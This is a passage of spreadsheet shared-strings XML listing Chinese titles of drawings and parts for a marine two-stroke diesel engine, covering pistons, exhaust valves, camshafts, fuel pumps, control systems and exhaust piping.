    <t xml:space="preserve">上紧说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连杆轴承清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">白合金曲柄销轴承                                          </t>
  </si>
  <si>
    <t xml:space="preserve">杆表面处理                                             </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆刮油环清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头截面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平衡重说明板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆火焰硬化说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆起吊工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">十字头起吊工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头质量控制说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">环槽                                                </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环清单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">新机器活塞对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支撑环焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头导向螺丝                                           </t>
  </si>
  <si>
    <t xml:space="preserve">吊活塞链条                                             </t>
  </si>
  <si>
    <t xml:space="preserve">填料函夹圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环扩涨器爪                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆夹圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力试验工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">整体式活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞/连杆安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却弯管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">进油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱外壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀气动图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀间隙                                             </t>
  </si>
  <si>
    <t xml:space="preserve">栏杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔塞布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">杆测量模板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀导套总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆.弹簧座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制油壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气弹簧管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">执行器盖+单向阀缸                                         </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀清洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀螺母上紧规格                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀底座量规                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀座研磨机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">研磨机支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀测量样板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀检测工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座研磨环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">零件图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">尺寸简图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷丸机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油压力升压器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵套筒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制油蓄油罐                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">喷油嘴总成固定                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴孔直径                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴详情                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器试验装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铣削工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">提升导程                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器体外部研磨器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器体内部研磨器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器头研磨器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴研磨器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀研磨心轴                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀壳研磨环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀销子扳手                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气动阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀试压计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油脂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液压管总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀组合图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵滚轮导套提升工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套外壳更换                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制油泵壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">垫片和凸轮升程技术数据                                       </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油凸轮放置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴清单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴承提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴加工数据表                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环门盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳前                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳后                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱(中段)                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱顶视图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱前侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱后侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向连杆锁定                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构调整                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套装置维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱形状位置公差                                        </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套千斤顶                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压力矩补偿器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压系统说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条标记                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮链轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹性销钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴链轮安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴调整                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构供应                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧臂                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涨紧螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涨紧装置调整                                            </t>
  </si>
  <si>
    <t xml:space="preserve">补充重块安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">维修和更改                                             </t>
  </si>
  <si>
    <t xml:space="preserve">惰轮装配总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮驱动安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链驱动液压工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">紧急换向工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向曲柄铣削                                            </t>
  </si>
  <si>
    <t xml:space="preserve">修理凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气凸轮修理                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制图解                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮标记                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油凸轮修理                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮公差                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承管理                                             </t>
  </si>
  <si>
    <t xml:space="preserve">流量控制器装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">仪表探头长度                                            </t>
  </si>
  <si>
    <t xml:space="preserve">封板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压力转换器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气仪表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力计面板支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">GRAVINER油雾探测器                                     </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器安装孔                                          </t>
  </si>
  <si>
    <t xml:space="preserve">温度探头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑物.传感器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">计算机辅助控制系统硬件                                       </t>
  </si>
  <si>
    <t xml:space="preserve">增压器转速表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">仪表布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电缆邦扎带                                             </t>
  </si>
  <si>
    <t xml:space="preserve">仪表支座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">指示盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">印刷板布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转换器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压差自动调节装置布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">柱塞套筒总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵柱塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油泵套筒检查仪                                           </t>
  </si>
  <si>
    <t xml:space="preserve">ACME螺纹常规测量                                        </t>
  </si>
  <si>
    <t xml:space="preserve">ACME螺纹公差                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵调整                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气系统调整                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气动活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">波纹管连接组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拉伸工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吸气阀拆卸工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">齿条垫                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵供应图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机电互锁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵转换                                              </t>
  </si>
  <si>
    <t xml:space="preserve">继电器代号                                             </t>
  </si>
  <si>
    <t xml:space="preserve">超速控制系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">超速继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">继电器箱描述                                            </t>
  </si>
  <si>
    <t xml:space="preserve">船桥控制清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">文字调整                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操控台电路图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发动机电子零件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制板图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">互锁机电图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接线箱图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">停车系统图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">报警面板图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动停车图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">位置传感器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">开关线路原理图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">指示仪表图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">慢转图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵控制设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">立体图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">风机电路板说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油器电气图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停缸要求规格                                            </t>
  </si>
  <si>
    <t xml:space="preserve">无人机舱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全系统要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机舱布置图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电气箱原理图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机接线说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">报警系统要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">VIT系统说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">参数列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">降速要求                                              </t>
  </si>
  <si>
    <t xml:space="preserve">负荷控制要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">随负荷变化的润滑说明                                        </t>
  </si>
  <si>
    <t xml:space="preserve">电流电压监控报警/降速说明                                     </t>
  </si>
  <si>
    <t xml:space="preserve">传感器列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调油轴总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调油轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹性负荷杆总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统电路图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">丝印                                                </t>
  </si>
  <si>
    <t xml:space="preserve">PMI测试设备布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PMI系统电路图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">位移传感器拧紧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PMI传感器安装孔                                         </t>
  </si>
  <si>
    <t xml:space="preserve">刮油系统电路图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">刮油传感器安装孔                                          </t>
  </si>
  <si>
    <t xml:space="preserve">图表-中间润滑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸磨损传感器孔                                          </t>
  </si>
  <si>
    <t xml:space="preserve">VMON系统电路图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴承控制，降速                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器盖孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环传感器孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器套筒盖孔                                         </t>
  </si>
  <si>
    <t xml:space="preserve">侧速传感器孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮定位销孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平均指示压力设备安装孔                                       </t>
  </si>
  <si>
    <t xml:space="preserve">自动控制参数推荐值                                         </t>
  </si>
  <si>
    <t xml:space="preserve">调速器限制图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子调速器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">联轴节安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">降功率柴油机适配器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">调节器增压机安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压泵管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泵组-题板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">超速管安装图表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车图表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器驱动轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">说明，发动机控制系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧预载拉杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气动布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">升压+自动装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">换向系统供气                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制装置总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调节阀总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">氮氧化物气体控制图表                                        </t>
  </si>
  <si>
    <t xml:space="preserve">氮氧化物分离控制说明                                        </t>
  </si>
  <si>
    <t xml:space="preserve">选择表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统转换                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空气瓶安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部件清单-空气集管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气动元件板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀组安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泵接头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">总阀布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">负荷调节装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵传输器装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰盘轴承装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">行程开关装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力转换器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">分配器气源控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电气箱安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电缆设计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支架板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">通风-测试装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">说明-控制系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵系统原理图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制系统描述                                            </t>
  </si>
  <si>
    <t xml:space="preserve">题板-开关布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机控制系统描述                                         </t>
  </si>
  <si>
    <t xml:space="preserve">元件清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">MS45网络                                            </t>
  </si>
  <si>
    <t xml:space="preserve">转速-燃料指数曲线                                         </t>
  </si>
  <si>
    <t xml:space="preserve">车间试验，提交测试                                         </t>
  </si>
  <si>
    <t xml:space="preserve">程序表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电报指令                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调整齿轮的调节                                           </t>
  </si>
  <si>
    <t xml:space="preserve">减压阀调节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃气系统-双燃油柴油机                                       </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆联接安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气动图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器和/或轴带发电机系统                                     </t>
  </si>
  <si>
    <t xml:space="preserve">车间试验                                              </t>
  </si>
  <si>
    <t xml:space="preserve">功率输出能力                                            </t>
  </si>
  <si>
    <t xml:space="preserve">TCS/PTI中间帽                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/PTI中间帽                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/RCF中间帽                                        </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/RCF.TCS/PTI发动机准备                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气管，动力透平                                          </t>
  </si>
  <si>
    <t xml:space="preserve">TCS/PTI外形                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/RCF外形                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/PTI外形                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/GCR外形                                         </t>
  </si>
  <si>
    <t xml:space="preserve">RCF润滑油补充                                          </t>
  </si>
  <si>
    <t xml:space="preserve">TCS管子布置原理图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">RCF管子连接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PTU滑油系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/GCR管子连接                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PTO/TCS前端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PTU最大推力                                           </t>
  </si>
  <si>
    <t xml:space="preserve">动力涡轮略图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">功率输出轴-柴油机末端                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PTO润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">功率涡轮密封空气                                          </t>
  </si>
  <si>
    <t xml:space="preserve">清洗罐装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PTO走台支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PTO走台支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">MIKRO开关                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导套壳体组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">异径接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功器考克安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器调整                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧器调整                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平衡块安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管加工图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管焊接图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管零件图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">加工描述                                              </t>
  </si>
  <si>
    <t xml:space="preserve">减振板导向                                             </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风机进口接管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防爆门接管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">人孔接管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">固定支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可选：单向阀布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空气支管总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔音，规范                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸油堵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">T形吸油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管检修孔盖                                          </t>
  </si>
  <si>
    <t xml:space="preserve">走台支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">进气连接管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气集管节流孔                                         </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接头定位圈                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器保护罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍连接的上T形管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">格栅螺栓连接支座                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">法兰短管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气接管隔热层                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管钢板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">2，3缸排气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸1+8排气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">2缸排气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">4缸排气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">4，5，6缸排气管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气管框架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管液压支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管液压支撑管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器出口排气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">P131管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接规范                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防热板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">人孔盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">表面处理                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吹风枪                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管旁通                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管应急旁通                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管复合涡轮系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管旁通（绝热）                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气管系统-尺寸                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器支撑和排气管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气系统，说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气管转接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气管连接图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">废气系统数据                                            </t>
  </si>
  <si>
    <t xml:space="preserve">废气噪音                                              </t>
  </si>
  <si>
    <t xml:space="preserve">废气管吹气                                             </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接头定位件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器最大力和力矩                                       </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器底脚                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气管保护层                                            </t>
  </si>
  <si>
    <t xml:space="preserve">透平侧水洗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间排气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器钻孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后排气管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮及调频轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前端链轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调频轮负荷表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴前端静载荷                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮和链轴节安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">展开的齿轮缘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气图表                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气电机                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盘车齿轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滤器供应图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">略图-润滑油滤器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滤器备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器供应图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器防护装置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器列表                                          </t>
  </si>
  <si>
    <t xml:space="preserve">复合冷却器列表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器防护装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油器调整                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分配体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器传动轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞控制                                              </t>
  </si>
  <si>
    <t xml:space="preserve">Y56F中心                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器MCU设定                                        </t>
  </si>
  <si>
    <t xml:space="preserve">压力计面板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度计套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">发电机驱动                                             </t>
  </si>
  <si>
